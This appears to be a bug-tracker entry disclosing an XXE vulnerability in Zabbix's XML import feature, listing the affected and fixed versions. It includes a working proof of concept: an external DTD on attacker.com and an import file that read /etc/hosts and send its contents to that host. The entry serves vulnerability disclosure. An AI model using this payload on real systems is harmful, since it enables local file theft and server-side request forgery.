Loading...

XML

Word

Printable

Type: Defect (Security)
Resolution: Fixed
Priority: Critical
Fix Version/s: 1.8.21rc1, 2.0.13rc1, 2.2.5rc1, 2.3.2
Affects Version/s: 1.8.19, 1.8.20, 2.0.9, 2.0.10, 2.0.11rc2, 2.0.11, 2.2.2, 2.2.3rc1, 2.2.3rc2, 2.2.3
Component/s: API (A), Frontend (F)
Labels:
- frontend
- import
- security
- vulnerability
- xxe
Environment:
CentOS 6.5 x84

zabbix frontend support xml data import feature,and server-side use DOMDocument to parse xml.DOMDocument also parse the external dtd in default.So attacker can use a crafted xml to read arbitrary local file and send http request use zabbix server as a proxy.

==Reproduction:
ext.dtd place at http://attacker.com/
<!ENTITY % all
"<!ENTITY % send SYSTEM 'http://attacker.com/?%file;'>"
>
%all;

zabbix.xml to import:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/hosts">
<!ENTITY % dtd SYSTEM "http://attacker.com/ext.dtd">
%dtd;
%send;
]]>
<zabbix_export>
</zabbix_export>
After import zabbix.xml to zabbix server,the contents of hosts file will send to attacker.com.Attacker can get the content by checking the website access log. If use file:///etc/hosts to replace php://filter/read=convert.base64-encode/resource=/etc/hosts.the file content will print on the web page as an error directly.

==
This bug was found by pnig0s@Freebuf

- - Sort By Name
  - Sort By Date
  - Ascending
  - Descending
  - Thumbnails
  - List
  - Download All

poc_screenshot_01.jpg
46 kB
2014 Apr 25 14:17
poc_screenshot_02.jpg
55 kB
2014 Apr 25 14:18
ZBX_8151_2_2_2.patch
2 kB
2014 Jun 20 14:55

Assignee:: Unassigned

Reporter:: pnig0s

Votes:: 0 Vote for this issue

Watchers:: 1 Start watching this issue

Created:: 2014 Apr 25 14:11

Updated:: 2020 Jul 16 14:10

Resolved:: 2014 Jun 26 13:39

Details

Description

Attachments

Attachments

Activity

People

Dates